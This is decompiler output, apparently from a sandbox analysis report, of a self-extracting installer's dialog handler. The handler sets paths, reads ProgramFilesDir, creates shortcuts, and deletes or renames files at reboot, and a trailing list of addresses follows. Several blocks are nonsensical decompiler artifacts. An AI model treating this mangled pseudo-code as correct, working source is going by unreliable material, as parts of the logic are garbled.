									E00CAA188(E00CAB625(_t285 - 0x7c84, _t285 - 0x5c84, _t285 - 0xdc8c, 0x800), _t263, _t285 - 0x8c8c, 0x800);
									 *(_t285 - 4) = _t277;
									E00CAA2C2(_t285 - 0x8c8c, _t285 - 0xdc8c);
									E00CA6EF9(_t285 - 0x3c84);
									_push(_t277);
									_t271 = _t285 - 0x8c8c;
									_t224 = E00CAA215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
									__eflags = _t224;
									if(_t224 == 0) {
										L26:
										 *(_t285 - 4) =  *(_t285 - 4) | 0xffffffff;
										E00CAA19E(_t285 - 0x8c8c);
										goto L164;
									} else {
										goto L13;
										L14:
										E00CAB1B7(_t271, __eflags, _t285 - 0x7c84, _t285 - 0x103c, _t282);
										E00CAAEA5(__eflags, _t285 - 0x103c, _t282);
										_t284 = E00CC2B33(_t285 - 0x7c84);
										__eflags = _t284 - 4;
										if(_t284 < 4) {
											L16:
											_t252 = E00CAB5E5(_t285 - 0x5c84);
											__eflags = _t252;
											if(_t252 != 0) {
												goto L26;
											}
											L17:
											_t254 = E00CC2B33(_t285 - 0x3c84);
											__eflags = 0;
											 *((short*)(_t285 + _t254 * 2 - 0x3c82)) = 0;
											E00CBE920(_t277, _t285 - 0x3c, _t277, 0x1e);
											_t287 = _t287 + 0x10;
											 *((intOrPtr*)(_t285 - 0x38)) = 3;
											_push(0x14);
											_pop(_t257);
											 *((short*)(_t285 - 0x2c)) = _t257;
											 *((intOrPtr*)(_t285 - 0x34)) = _t285 - 0x3c84;
											_push(_t285 - 0x3c);
											 *0xcddef4();
											goto L18;
										}
										L15:
										_t262 = E00CC2B33(_t285 - 0x103c);
										__eflags = _t284 - _t262;
										if(_t284 > _t262) {
											goto L17;
										}
										goto L16;
										L18:
										_t229 = GetFileAttributesW(_t285 - 0x3c84);
										__eflags = _t229 - 0xffffffff;
										if(_t229 == 0xffffffff) {
											L25:
											_push(_t277);
											_t271 = _t285 - 0x8c8c;
											_t231 = E00CAA215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
											__eflags = _t231;
											if(_t231 != 0) {
												_t282 = 0x800;
												L13:
												SetFileAttributesW(_t285 - 0x3c84, _t277);
												__eflags =  *((char*)(_t285 - 0x2c78));
												if(__eflags == 0) {
													goto L18;
												}
												goto L14;
											}
											goto L26;
										}
										L19:
										_t233 = DeleteFileW(_t285 - 0x3c84);
										__eflags = _t233;
										if(_t233 != 0) {
											goto L25;
										} else {
											_t283 = _t277;
											_push(_t277);
											goto L22;
											L22:
											E00CA3E41(_t285 - 0x103c, 0x800, L"%s.%d.tmp", _t285 - 0x3c84);
											_t287 = _t287 + 0x14;
											_t238 = GetFileAttributesW(_t285 - 0x103c);
											__eflags = _t238 - 0xffffffff;
											if(_t238 != 0xffffffff) {
												_t283 = _t283 + 1;
												__eflags = _t283;
												_push(_t283);
												goto L22;
											} else {
												_t241 = MoveFileW(_t285 - 0x3c84, _t285 - 0x103c);
												__eflags = _t241;
												if(_t241 != 0) {
													MoveFileExW(_t285 - 0x103c, _t277, 4);
												}
												goto L25;
											}
										}
									}
								case 1:
									L27:
									__eflags = __ebx;
									if(__ebx == 0) {
										__eax =  *0xcfce0c;
										__eflags =  *0xcfce0c;
										__ebx = __ebx & 0xffffff00 |  *0xcfce0c == 0x00000000;
										__eflags = __bl;
										if(__bl == 0) {
											__eax =  *0xcfce0c;
											_pop(__ecx);
											_pop(__ecx);
										}
										L30:
										__bh =  *((intOrPtr*)(__ebp - 0xd));
										__eflags = __bh;
										if(__eflags == 0) {
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											__esi = E00CBA2AE(__ecx, __edx, __eflags);
											__eax =  *0xcfce0c;
										} else {
											__esi = __ebp - 0x5c84;
										}
										__eflags = __bl;
										if(__bl == 0) {
											__edi = __eax;
										}
										L35:
										__eax = E00CC2B33(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0xcfce0c);
										__eax = E00CC2B5E(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax != 0) {
											 *0xcfce0c = __eax;
											__eflags = __bl;
											if(__bl != 0) {
												__ecx = 0;
												__eflags = 0;
												 *__eax = __cx;
											}
											__eax = E00CC66ED(__eax, __esi);
											_pop(__ecx);
											_pop(__ecx);
										}
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L00CC2B4E(__esi);
										}
									}
									goto L164;
								case 2:
									L41:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
									}
									goto L164;
								case 3:
									L43:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L164;
									}
									L44:
									__eflags =  *0xce9602 - __di;
									if( *0xce9602 != __di) {
										goto L164;
									}
									L45:
									__eax = 0;
									__edi = __ebp - 0x5c84;
									_push(0x22);
									 *(__ebp - 0x103c) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x5c84) - __ax;
									if( *(__ebp - 0x5c84) == __ax) {
										__edi = __ebp - 0x5c82;
									}
									__eax = E00CC2B33(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L164;
									} else {
										L48:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L52:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L64:
												__ebp - 0x103c = E00CAFAB1(__ebp - 0x103c, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L65:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x103c;
												__eax = E00CC0D9B(__ebp - 0x103c, __ebp - 0x103c);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
													if( *((intOrPtr*)(__eax + 2)) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x103c;
												__edi = 0xce9602;
												E00CAFAB1(0xce9602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
												__eax = E00CB9FFC(__ebp - 0x103c, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
												__ebx =  *0xcddf7c;
												__eax = SendMessageW(__esi, 0x143, __ebx, 0xce9602); // executed
												__eax = __ebp - 0x103c;
												__eax = E00CC2B69(__ebp - 0x103c, 0xce9602, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x103c = 0;
													__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
												}
												goto L164;
											}
											L53:
											__eflags = __ax;
											if(__ax == 0) {
												L55:
												__eax = __ebp - 0x18;
												__ebx = 0;
												_push(__ebp - 0x18);
												_push(1);
												_push(0);
												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
												_push(0x80000002);
												__eax =  *0xcddea8();
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													_push(__ebp - 0x14);
													__eax = __ebp - 0x103c;
													_push(__ebp - 0x103c);
													__eax = __ebp - 0x1c;
													_push(__ebp - 0x1c);
													_push(0);
													_push(L"ProgramFilesDir");
													_push( *(__ebp - 0x18));
													__eax =  *0xcddea4();
													_push( *(__ebp - 0x18));
													 *0xcdde84() =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *((short*)(__ebp + __eax * 2 - 0x103c)) = __cx;
												}
												__eflags =  *(__ebp - 0x103c) - __bx;
												if( *(__ebp - 0x103c) != __bx) {
													__eax = __ebp - 0x103c;
													__eax = E00CC2B33(__ebp - 0x103c);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x103c = E00CAFA89(__eflags, __ebp - 0x103c, "\\", __esi);
													}
												}
												__esi = E00CC2B33(__edi);
												__eax = __ebp - 0x103c;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x103c = E00CAFA89(__eflags, __ebp - 0x103c, __edi, 0x800);
												}
												goto L65;
											}
											L54:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L64;
											}
											goto L55;
										}
										L49:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L52;
										}
										L50:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L164;
										}
										L51:
										__ebp - 0x103c = E00CAFAB1(__ebp - 0x103c, __edi, 0x800);
										goto L65;
									}
								case 4:
									L70:
									__eflags =  *0xce95fc - 1;
									__eflags = __eax - 0xce95fc;
									 *__edi =  *__edi + __ecx;
									__eflags =  *(__ebx + 6) & __bl;
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L75:
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L82:
										 *0xce75d2 = __cl;
										 *0xce75d3 = 1;
										goto L164;
									}
									L76:
									__eax = __eax - 0x30;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0xce75d2 = __cl;
										L81:
										 *0xce75d3 = __cl;
										goto L164;
									}
									L77:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L82;
									}
									L78:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L164;
									}
									L79:
									 *0xce75d2 = 1;
									goto L81;
								case 6:
									L88:
									__eflags = __ebx - 4;
									if(__ebx != 4) {
										goto L92;
									}
									L89:
									__eax = __ebp - 0x5c84;
									__eax = E00CC2B69(__ebp - 0x5c84, __eax, L"<>");
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax == 0) {
										goto L92;
									}
									L90:
									_push(__edi);
									goto L91;
								case 7:
									goto L0;
								case 8:
									L116:
									__eflags = __ebx - 3;
									if(__ebx == 3) {
										__eflags =  *(__ebp - 0x5c84) - __di;
										if(__eflags != 0) {
											__eax = __ebp - 0x5c84;
											_push(__ebp - 0x5c84);
											__eax = E00CC668C(__ebx, __edi);
											_pop(__ecx);
											 *0xcfde1c = __eax;
										}
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										 *0xcfde18 = E00CBA2AE(__ecx, __edx, __eflags);
									}
									 *0xcf5d03 = 1;
									goto L164;
								case 9:
									L121:
									__eflags = __ebx - 5;
									if(__ebx != 5) {
										L92:
										 *0xcfde20 = 1;
										goto L164;
									}
									L122:
									_push(1);
									L91:
									__eax = __ebp - 0x5c84;
									_push(__ebp - 0x5c84);
									_push( *(__ebp + 8));
									__eax = E00CBC431();
									goto L92;
								case 0xa:
									L123:
									__eflags = __ebx - 6;
									if(__ebx != 6) {
										goto L164;
									}
									L124:
									__eax = 0;
									 *(__ebp - 0x2c3c) = __ax;
									__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
									__eax = E00CC59C0( *(__ebp - 0x1bc8c) & 0x0000ffff);
									_push(0x800);
									__eflags = __eax - 0x50;
									if(__eax == 0x50) {
										_push(0xcfad0a);
										__eax = __ebp - 0x2c3c;
										_push(__ebp - 0x2c3c);
										__eax = E00CAFAB1();
										 *(__ebp - 0x14) = 2;
									} else {
										__eflags = __eax - 0x54;
										__eax = __ebp - 0x2c3c;
										if(__eflags == 0) {
											_push(0xcf9d0a);
											_push(__eax);
											__eax = E00CAFAB1();
											 *(__ebp - 0x14) = 7;
										} else {
											_push(0xcfbd0a);
											_push(__eax);
											__eax = E00CAFAB1();
											 *(__ebp - 0x14) = 0x10;
										}
									}
									__eax = 0;
									 *(__ebp - 0x9c8c) = __ax;
									 *(__ebp - 0x1c3c) = __ax;
									__ebp - 0x19c8c = __ebp - 0x6c84;
									__eax = E00CC4D7E(__ebp - 0x6c84, __ebp - 0x19c8c);
									_pop(__ecx);
									_pop(__ecx);
									_push(0x22);
									_pop(__ebx);
									__eflags =  *(__ebp - 0x6c84) - __bx;
									if( *(__ebp - 0x6c84) != __bx) {
										L132:
										__ebp - 0x6c84 = E00CA9E6B(__ebp - 0x6c84);
										__eflags = __al;
										if(__al != 0) {
											goto L149;
										}
										L133:
										__ebx = __edi;
										__esi = __ebp - 0x6c84;
										__eflags =  *(__ebp - 0x6c84) - __bx;
										if( *(__ebp - 0x6c84) == __bx) {
											goto L149;
										}
										L134:
										_push(0x20);
										_pop(__ecx);
										do {
											L135:
											__eax = __esi->i & 0x0000ffff;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L137:
												__edi = __eax;
												__eax = 0;
												__esi->i = __ax;
												__ebp - 0x6c84 = E00CA9E6B(__ebp - 0x6c84);
												__eflags = __al;
												if(__al == 0) {
													L144:
													__esi->i = __di;
													L145:
													_push(0x20);
													_pop(__ecx);
													__edi = 0;
													__eflags = 0;
													goto L146;
												}
												L138:
												_push(0x2f);
												_pop(__eax);
												__ebx = __esi;
												__eflags = __di - __ax;
												if(__di != __ax) {
													L140:
													_push(0x20);
													_pop(__eax);
													do {
														L141:
														__esi =  &(__esi->i);
														__eflags = __esi->i - __ax;
													} while (__esi->i == __ax);
													_push(__esi);
													__eax = __ebp - 0x1c3c;
													L143:
													_push(__eax);
													__eax = E00CC4D7E();
													_pop(__ecx);
													_pop(__ecx);
													 *__ebx = __di;
													goto L145;
												}
												L139:
												 *(__ebp - 0x1c3c) = __ax;
												__eax =  &(__esi->i);
												_push( &(__esi->i));
												__eax = __ebp - 0x1c3a;
												goto L143;
											}
											L136:
											_push(0x2f);
											_pop(__edx);
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L146;
											}
											goto L137;
											L146:
											__esi =  &(__esi->i);
											__eflags = __esi->i - __di;
										} while (__esi->i != __di);
										__eflags = __ebx;
										if(__ebx != 0) {
											__eax = 0;
											__eflags = 0;
											 *__ebx = __ax;
										}
										goto L149;
									} else {
										L130:
										__ebp - 0x19c8a = __ebp - 0x6c84;
										E00CC4D7E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
										_push(__ebx);
										_push(__ebp - 0x6c82);
										__eax = E00CC0BB8(__ecx);
										__esp = __esp + 0x10;
										__eflags = __eax;
										if(__eax != 0) {
											__ecx = 0;
											 *__eax = __cx;
											__ebp - 0x1c3c = E00CC4D7E(__ebp - 0x1c3c, __ebp - 0x1c3c);
											_pop(__ecx);
											_pop(__ecx);
										}
										L149:
										__eflags =  *(__ebp - 0x11c8c);
										__ebx = 0x800;
										if( *(__ebp - 0x11c8c) != 0) {
											_push(0x800);
											__eax = __ebp - 0x9c8c;
											_push(__ebp - 0x9c8c);
											__eax = __ebp - 0x11c8c;
											_push(__ebp - 0x11c8c);
											__eax = E00CAAED7();
										}
										_push(__ebx);
										__eax = __ebp - 0xbc8c;
										_push(__ebp - 0xbc8c);
										__eax = __ebp - 0x6c84;
										_push(__ebp - 0x6c84);
										__eax = E00CAAED7();
										__eflags =  *(__ebp - 0x2c3c);
										if(__eflags == 0) {
											__ebp - 0x2c3c = E00CBA24E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
										}
										__ebp - 0x2c3c = E00CAAEA5(__eflags, __ebp - 0x2c3c, __ebx);
										__eflags =  *((short*)(__ebp - 0x17c8c));
										if(__eflags != 0) {
											__ebp - 0x17c8c = __ebp - 0x2c3c;
											E00CAFA89(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
											__eax = E00CAAEA5(__eflags, __ebp - 0x2c3c, __ebx);
										}
										__ebp - 0x2c3c = __ebp - 0xcc8c;
										__eax = E00CC4D7E(__ebp - 0xcc8c, __ebp - 0x2c3c);
										__eflags =  *(__ebp - 0x13c8c);
										__eax = __ebp - 0x13c8c;
										_pop(__ecx);
										_pop(__ecx);
										if(__eflags == 0) {
											__eax = __ebp - 0x19c8c;
										}
										__ebp - 0x2c3c = E00CAFA89(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
										__eax = __ebp - 0x2c3c;
										__eflags = E00CAB153(__ebp - 0x2c3c);
										if(__eflags == 0) {
											L159:
											__ebp - 0x2c3c = E00CAFA89(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
											goto L160;
										} else {
											L158:
											__eflags = __eax;
											if(__eflags == 0) {
												L160:
												_push(1);
												__eax = __ebp - 0x2c3c;
												_push(__ebp - 0x2c3c);
												E00CA9D3A(__ecx, __ebp) = __ebp - 0xbc8c;
												__ebp - 0xac8c = E00CC4D7E(__ebp - 0xac8c, __ebp - 0xbc8c);
												_pop(__ecx);
												_pop(__ecx);
												__ebp - 0xac8c = E00CAB98D(__eflags, __ebp - 0xac8c);
												__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
												__eax = __ebp - 0x1c3c;
												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
												__edx = __ebp - 0x9c8c;
												__esi = __ebp - 0xac8c;
												asm("sbb ecx, ecx");
												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
												 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
												asm("sbb eax, eax");
												__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
												 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
												__eax = __ebp - 0x15c8c;
												asm("sbb edx, edx");
												__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
												E00CB9D41(__ebp - 0x15c8c) = __ebp - 0x2c3c;
												__ebp - 0xbc8c = E00CB9450(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
												__eflags =  *(__ebp - 0xcc8c);
												if( *(__ebp - 0xcc8c) != 0) {
													_push(__edi);
													__eax = __ebp - 0xcc8c;
													_push(__ebp - 0xcc8c);
													_push(5);
													_push(0x1000);
													__eax =  *0xcddef8();
												}
												goto L164;
											}
											goto L159;
										}
									}
								case 0xb:
									L162:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										 *0xce9600 = 1;
									}
									goto L164;
								case 0xc:
									L83:
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__eax = E00CC59C0( *(__ebp - 0x5c84) & 0x0000ffff);
									__eflags = __eax - 0x46;
									if(__eax == 0x46) {
										 *0xce75d4 = 1;
									} else {
										__eflags = __eax - 0x55;
										if(__eax == 0x55) {
											 *0xce75d5 = 1;
										} else {
											__eax = 0;
											 *0xce75d4 = __al;
											 *0xce75d5 = __al;
										}
									}
									goto L164;
								case 0xd:
									L93:
									 *0xcfde21 = 1;
									__eax = __eax + 0xcfde21;
									_t104 = __esi + 0x39;
									 *_t104 =  *(__esi + 0x39) + __esp;
									__eflags =  *_t104;
									__ebp = 0xffffa37c;
									if( *_t104 != 0) {
										_t106 = __ebp - 0x5c84; // 0xffff46f8
										__eax = _t106;
										_push(_t106);
										 *0xcdd5fc = E00CB13FC();
									}
									goto L164;
							}
							L2:
							_t210 = E00CB9E24(_t210, _t279);
							_t279 = _t279 + 0x2000;
							_t277 = _t277 - 1;
							if(_t277 != 0) {
								goto L2;
							} else {
								_t280 = _t277;
								goto L4;
							}
						}
						L165:
						 *[fs:0x0] =  *((intOrPtr*)(_t285 - 0xc));
						return _t209;
					}
					L100:
					__eflags =  *0xcf5d02;
					if( *0xcf5d02 != 0) {
						goto L164;
					}
					L101:
					__eax = 0;
					 *(__ebp - 0x143c) = __ax;
					__eax = __ebp - 0x5c84;
					_push(__ebp - 0x5c84);
					__eax = E00CC0BB8(__ecx);
					_pop(__ecx);
					__ecx = 0x2c;
					__eflags = __eax;
					if(__eax != 0) {
						L108:
						__eflags =  *(__ebp - 0x143c);
						if( *(__ebp - 0x143c) == 0) {
							__ebp - 0x1bc8c = __ebp - 0x5c84;
							E00CAFAB1(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
							__ebp - 0x143c = E00CAFAB1(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
						}
						__ebp - 0x5c84 = E00CB9C4F(__ebp - 0x5c84);
						__eax = 0;
						 *(__ebp - 0x4c84) = __ax;
						__ebp - 0x143c = __ebp - 0x5c84;
						__eax = E00CB9735( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
						__eflags = __eax - 6;
						if(__eax == 6) {
							goto L164;
						} else {
							L111:
							__eax = 0;
							__eflags = 0;
							 *0xce75d7 = 1;
							 *0xce85fa = __ax;
							__eax = EndDialog( *(__ebp + 8), 1);
							goto L112;
						}
					}
					L102:
					__esi = 0;
					__eflags =  *(__ebp - 0x5c84) - __dx;
					if( *(__ebp - 0x5c84) == __dx) {
						goto L108;
					}
					L103:
					__ecx = 0;
					__eax = __ebp - 0x5c84;
					while(1) {
						L104:
						__eflags =  *__eax - 0x40;
						if( *__eax == 0x40) {
							break;
						}
						L105:
						__esi =  &(__esi->i);
						__eax = __ebp - 0x5c84;
						__ecx = __esi + __esi;
						__eax = __ebp - 0x5c84 + __ecx;
						__eflags =  *__eax - __dx;
						if( *__eax != __dx) {
							continue;
						}
						L106:
						goto L108;
					}
					L107:
					__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
					__ebp - 0x143c = E00CAFAB1(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
					__eax = 0;
					__eflags = 0;
					 *(__ebp + __esi * 2 - 0x5c84) = __ax;
					goto L108;
					L112:
					__eflags = _t263 - 7;
					if(_t263 == 7) {
						__eflags =  *0xce95fc;
						if( *0xce95fc == 0) {
							 *0xce95fc = 2;
						}
						 *0xce85f8 = 1;
					}
					goto L164;
				}
			}










                0x00cbbb5b
                0x00cbbb5b
                0x00cbbb5b
                0x00cbbb5b
                0x00cbbb5e
                0x00000000
                0x00000000
                0x00cbbb64
                0x00cbbb64
                0x00cbbb6a
                0x00cbbb78
                0x00cbbb84
                0x00cbbb86
                0x00cbbb88
                0x00cbbb8d
                0x00cbbb8d
                0x00cbbb8d
                0x00cbbba5
                0x00cbbbb2
                0x00cbbbb7
                0x00cbbbb9
                0x00000000
                0x00000000
                0x00cbbb8b
                0x00cbbb8b
                0x00cbbb8b
                0x00cbbb8c
                0x00cbbb8c
                0x00cbbbbb
                0x00cbbbc5
                0x00cbbbcb
                0x00cbbbd3
                0x00cbc093
                0x00cbc093
                0x00cbc093
                0x00cbc098
                0x00cbc09c
                0x00cbc0a0
                0x00cbc0a7
                0x00cbc0ae
                0x00cbc0b1
                0x00cbc0b6
                0x00cbc0b9
                0x00cbc0be
                0x00cbb51d
                0x00cbb523
                0x00cbb529
                0x00cbb529
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cbb53e
                0x00cbb555
                0x00cbb559
                0x00000000
                0x00cbb55b
                0x00000000
                0x00cbb55b
                0x00cbb559
                0x00cbb560
                0x00cbb563
                0x00000000
                0x00000000
                0x00cbb569
                0x00cbb569
                0x00000000
                0x00cbb570
                0x00cbb570
                0x00cbb573
                0x00000000
                0x00000000
                0x00cbb579
                0x00cbb579
                0x00cbb586
                0x00cbb5ac
                0x00cbb5b7
                0x00cbb5c1
                0x00cbb5cc
                0x00cbb5d1
                0x00cbb5d9
                0x00cbb5df
                0x00cbb5e4
                0x00cbb5e6
                0x00cbb74b
                0x00cbb74b
                0x00cbb755
                0x00000000
                0x00cbb5ec
                0x00cbb5f2
                0x00cbb614
                0x00cbb623
                0x00cbb630
                0x00cbb641
                0x00cbb644
                0x00cbb647
                0x00cbb65a
                0x00cbb661
                0x00cbb666
                0x00cbb668
                0x00000000
                0x00000000
                0x00cbb66e
                0x00cbb675
                0x00cbb67a
                0x00cbb67f
                0x00cbb68b
                0x00cbb690
                0x00cbb693
                0x00cbb69a
                0x00cbb69c
                0x00cbb69d
                0x00cbb6a7
                0x00cbb6ad
                0x00cbb6ae
                0x00000000
                0x00cbb6ae
                0x00cbb649
                0x00cbb650
                0x00cbb656
                0x00cbb658
                0x00000000
                0x00000000
                0x00000000
                0x00cbb6b4
                0x00cbb6bb
                0x00cbb6bd
                0x00cbb6c0
                0x00cbb730
                0x00cbb730
                0x00cbb738
                0x00cbb73e
                0x00cbb743
                0x00cbb745
                0x00cbb5f4
                0x00cbb5f9
                0x00cbb601
                0x00cbb607
                0x00cbb60e
                0x00000000
                0x00000000
                0x00000000
                0x00cbb60e
                0x00000000
                0x00cbb745
                0x00cbb6c2
                0x00cbb6c9
                0x00cbb6cf
                0x00cbb6d1
                0x00000000
                0x00cbb6d3
                0x00cbb6d3
                0x00cbb6d5
                0x00cbb6d6
                0x00cbb6da
                0x00cbb6f2
                0x00cbb6f7
                0x00cbb701
                0x00cbb703
                0x00cbb706
                0x00cbb6d8
                0x00cbb6d8
                0x00cbb6d9
                0x00000000
                0x00cbb708
                0x00cbb716
                0x00cbb71c
                0x00cbb71e
                0x00cbb72a
                0x00cbb72a
                0x00000000
                0x00cbb71e
                0x00cbb706
                0x00cbb6d1
                0x00000000
                0x00cbb75f
                0x00cbb75f
                0x00cbb761
                0x00cbb767
                0x00cbb76c
                0x00cbb76e
                0x00cbb771
                0x00cbb773
                0x00cbb780
                0x00cbb785
                0x00cbb786
                0x00cbb786
                0x00cbb787
                0x00cbb787
                0x00cbb78a
                0x00cbb78c
                0x00cbb796
                0x00cbb799
                0x00cbb79f
                0x00cbb7a1
                0x00cbb78e
                0x00cbb78e
                0x00cbb78e
                0x00cbb7a6
                0x00cbb7a8
                0x00cbb7b1
                0x00cbb7b1
                0x00cbb7b3
                0x00cbb7b4
                0x00cbb7b9
                0x00cbb7c2
                0x00cbb7c3
                0x00cbb7c9
                0x00cbb7ce
                0x00cbb7d1
                0x00cbb7d3
                0x00cbb7d5
                0x00cbb7da
                0x00cbb7dc
                0x00cbb7de
                0x00cbb7de
                0x00cbb7e0
                0x00cbb7e0
                0x00cbb7e5
                0x00cbb7ea
                0x00cbb7eb
                0x00cbb7eb
                0x00cbb7ec
                0x00cbb7ee
                0x00cbb7f5
                0x00cbb7fa
                0x00cbb7ee
                0x00000000
                0x00000000
                0x00cbb800
                0x00cbb800
                0x00cbb802
                0x00cbb812
                0x00cbb812
                0x00000000
                0x00000000
                0x00cbb81d
                0x00cbb81d
                0x00cbb81f
                0x00000000
                0x00000000
                0x00cbb825
                0x00cbb825
                0x00cbb82c
                0x00000000
                0x00000000
                0x00cbb832
                0x00cbb832
                0x00cbb834
                0x00cbb83a
                0x00cbb83c
                0x00cbb843
                0x00cbb844
                0x00cbb84b
                0x00cbb84d
                0x00cbb84d
                0x00cbb854
                0x00cbb859
                0x00cbb85f
                0x00cbb861
                0x00000000
                0x00cbb867
                0x00cbb867
                0x00cbb867
                0x00cbb86a
                0x00cbb86c
                0x00cbb86d
                0x00cbb870
                0x00cbb899
                0x00cbb899
                0x00cbb89c
                0x00cbb981
                0x00cbb98a
                0x00cbb98f
                0x00cbb98f
                0x00cbb991
                0x00cbb991
                0x00cbb993
                0x00cbb995
                0x00cbb99c
                0x00cbb9a1
                0x00cbb9a2
                0x00cbb9a3
                0x00cbb9a5
                0x00cbb9a7
                0x00cbb9ab
                0x00cbb9ad
                0x00cbb9ad
                0x00cbb9af
                0x00cbb9af
                0x00cbb9ab
                0x00cbb9b3
                0x00cbb9b9
                0x00cbb9c6
                0x00cbb9cd
                0x00cbb9dd
                0x00cbb9e7
                0x00cbb9ef
                0x00cbb9fb
                0x00cbb9fd
                0x00cbba05
                0x00cbba0a
                0x00cbba0b
                0x00cbba0c
                0x00cbba0e
                0x00cbba1b
                0x00cbba24
                0x00cbba24
                0x00000000
                0x00cbba0e
                0x00cbb8a2
                0x00cbb8a2
                0x00cbb8a5
                0x00cbb8b2
                0x00cbb8b2
                0x00cbb8b5
                0x00cbb8b7
                0x00cbb8b8
                0x00cbb8ba
                0x00cbb8bb
                0x00cbb8c0
                0x00cbb8c5
                0x00cbb8cb
                0x00cbb8cd
                0x00cbb8cf
                0x00cbb8d2
                0x00cbb8d9
                0x00cbb8da
                0x00cbb8e0
                0x00cbb8e1
                0x00cbb8e4
                0x00cbb8e5
                0x00cbb8e6
                0x00cbb8eb
                0x00cbb8ee
                0x00cbb8f4
                0x00cbb8fd
                0x00cbb900
                0x00cbb905
                0x00cbb907
                0x00cbb909
                0x00cbb90b
                0x00cbb90b
                0x00cbb90d
                0x00cbb90d
                0x00cbb90f
                0x00cbb90f
                0x00cbb917
                0x00cbb91e
                0x00cbb920
                0x00cbb927
                0x00cbb92d
                0x00cbb92f
                0x00cbb930
                0x00cbb938
                0x00cbb947
                0x00cbb947
                0x00cbb938
                0x00cbb952
                0x00cbb954
                0x00cbb963
                0x00cbb969
                0x00cbb96f
                0x00cbb97a
                0x00cbb97a
